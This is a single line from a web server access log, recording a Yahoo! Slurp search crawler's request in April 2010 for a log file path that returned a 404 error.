67.195.112.180 - - [15/Apr/2010:21:03:36 -0500] "GET /logs/access_log.1219622400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
